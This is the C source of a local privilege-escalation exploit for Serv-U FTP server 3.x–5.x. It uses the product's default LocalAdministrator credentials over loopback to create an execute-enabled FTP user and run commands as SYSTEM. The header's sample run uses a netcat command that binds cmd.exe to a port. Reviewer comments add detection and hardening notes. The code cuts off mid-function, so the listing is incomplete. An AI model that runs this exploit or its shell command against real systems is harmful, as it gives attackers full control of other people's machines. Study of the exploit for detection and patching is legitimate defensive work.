Serv-U 3.x - 4.x - 5.x local privilege escalation to SYSTEM Exploit


                        
/*
 * Hax0rcitos proudly presents
 * Serv-u Local Exploit >v3.x. (tested also against last version 5.1.0.0)
 *
 * All Serv-u versions have a default login/password for local administration.
 * This account can only connect over the loopback interface, so a
 * local user is able to connect to Serv-u with this account and create
 * an ftp user with execute rights. After the user is created, just connect
 * to the ftp server and execute a raw "SITE EXEC" command. The program will
 * be executed with SYSTEM privileges.
 *
 * Copyright (c) 2003-2004  Haxorcitos com . All Rights Reserved.
 *
 * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
 * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
 * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
 *
 *
 * Date:   10/2003
 * Author: Andrés Tarascó Acunha
 *
 * Greetings to: #haxorcitos - #localhost and #!dsr blackxors =)
 *
 * Tested Against Serv-u 4.x and v5.1.0.0

         G:\exploit\serv-U\local>whoami
        INSANE\aT4r

        G:\exploit\serv-U\local>servulocal.exe "nc -l -p 99 -e cmd.exe"
        Serv-u >3.x Local Exploit by Haxorcitos

        USER LocalAdministrator
        PASS #l@$ak#.lk;0@P
        SITE MAINTENANCE
        ******************************************************
        [+] Creating New Domain...
        USER haxorcitos
        PASS whitex0r
        nc localhost 99
        Microsoft Windows XP [Versión 5.1.2600]
        (C) Copyright 1985-2001 Microsoft Corp.

        C:\>whoami
        whoami
        NT AUTHORITY\SYSTEM
         C:\>
  */

#include 
#include 
#include 
#include 
#include 

// Responses
// Reply-text prefixes the server is expected to send at each step. How they
// are compared is not visible here (the ParseCommands body is cut off in this
// listing); presumably they are passed as its `response` argument.
#define BANNER                  "220 "
#define USEROK                  "331 User name okay"
#define PASSOK                  "230 User logged in, proceed."
#define ADMOK                   "230-Switching to SYSTEM MAINTENANCE mode."
#define DOMAINID                "200-DomainID="
// Commands
// Raw FTP command lines, each terminated with CRLF.

// Login for the FTP account that the newuser[] request creates.
#define XPLUSER                    "USER haxorcitos\r\n"
#define XPLPASSWORD                "PASS whitex0r\r\n"
// Login for the built-in local administration account described in the header
// comment. A vendor-fixed credential shared by every install is the root
// cause: loopback-only reachability does not separate an unprivileged local
// user from the administrator.
// Defender note: a LocalAdministrator login followed by SITE MAINTENANCE from
// any process other than the product's own administration client is worth
// alerting on.
#define USER                    "USER LocalAdministrator\r\n"
#define PASSWORD                "PASS #l@$ak#.lk;\r\n"

// Requests maintenance mode; ADMOK above is the matching expected reply text.
#define MAINTENANCE             "SITE MAINTENANCE\r\n"
// Ends the FTP session.
#define EXIT                    "QUIT\r\n"
// Maintenance-mode request that registers an FTP domain named "haxorcitos".
// The pipe-separated value carries 0.0.0.0 and 2121, matching the -IP/PortNo
// fields of deldomain[], so presumably name|IP|port; the remaining fields are
// not explained anywhere in this listing.
// Defender note: an FTP domain or listener on port 2121 that nobody
// provisioned is an artifact of this technique.
char newdomain[]="-SETDOMAIN\r\n"
                 "-Domain=haxorcitos|0.0.0.0|2121|-1|1|0\r\n"
                 "-TZOEnable=0\r\n"
                 " TZOKey=\r\n";
/*               "-DynDNSEnable=0\r\n"
                 " DynIPName=\r\n";
*/
// Maintenance-mode request that deletes the domain on 0.0.0.0 port 2121.
// Where it is sent is not visible in this listing. If it runs as cleanup, the
// domain will not remain in the server configuration, so detection has to rely
// on FTP and process logs rather than on a later configuration audit.
char deldomain[]="-DELETEDOMAIN\r\n"
                 "-IP=0.0.0.0\r\n"
                 " PortNo=2121\r\n";

// Maintenance-mode request that creates FTP user "haxorcitos" in the domain on
// 0.0.0.0 port 2121, with its home directory and its access rule both set to
// the root of drive C. The header comment says the user is created "with
// execute rights"; presumably that is the E in the RELP flags of the Access
// line (TODO confirm against the vendor documentation).
// Defender note: audit Serv-U accounts for execute permission, and treat
// SITE EXEC in FTP logs, or child processes spawned by the FTP service, as
// high-signal events.
// Hardening: where the installed version supports it, change the local
// administration password and run the service under a low-privileged account
// instead of SYSTEM; restrict interactive logon to the host.
char newuser[] =
                "-SETUSERSETUP\r\n"
                "-IP=0.0.0.0\r\n"
                "-PortNo=2121\r\n"
                "-User=haxorcitos\r\n"
                "-Password=whitex0r\r\n"
                "-HomeDir=c:\\\r\n"
                "-LoginMesFile=\r\n"
                "-Disable=0\r\n"
                "-RelPaths=1\r\n"
                "-NeedSecure=0\r\n"
                "-HideHidden=0\r\n"
                "-AlwaysAllowLogin=0\r\n"
                "-ChangePassword=0\r\n"
                "-QuotaEnable=0\r\n"
                "-MaxUsersLoginPerIP=-1\r\n"
                "-SpeedLimitUp=0\r\n"
                "-SpeedLimitDown=0\r\n"
                "-MaxNrUsers=-1\r\n"
                "-IdleTimeOut=600\r\n"
                "-SessionTimeOut=-1\r\n"
                "-Expire=0\r\n"
                "-RatioUp=1\r\n"
                "-RatioDown=1\r\n"
                "-RatiosCredit=0\r\n"
                "-QuotaCurrent=0\r\n"
                "-QuotaMaximum=0\r\n"
                "-Maintenance=None\r\n"
                "-PasswordType=Regular\r\n"
                "-Ratios=None\r\n"
                " Access=c:\\|RELP\r\n";

// Local administration endpoint. The header comment states the administration
// account is only usable over loopback; presumably this address and port are
// the connect target (the socket setup is not shown in this listing).
// Defender note: connections to this loopback port from processes other than
// the product's own administration client are a useful host-level signal.
#define localport 43958
#define localip "127.0.0.1"

// Shared receive buffer ("cadena" is Spanish for "string"), filled by recv()
// in ParseCommands.
// NOTE(review): ParseCommands passes sizeof(cadena) to recv() and then writes
// cadena[rec]. A full 1024-byte read therefore writes one byte past the end,
// and a negative return from recv() indexes before the buffer.
char cadena[1024];
// rec holds the return value of the last recv(); the use of domain is not
// visible in this listing.
int rec,domain;
/******************************************************************************/

void ParseCommands(int sock, char *data, int ShowSend, int showResponses,
char *response) {
 send(sock,data,strlen(data),0);
 if (ShowSend) printf(">%s",data);
 Sleep(100);
 do {
         rec=recv(sock,cadena,sizeof(cadena),0); cadena[rec]='\0';
         if (rec3.x Local Exploit by Haxorcitos\r\n\r\n");
if (argc
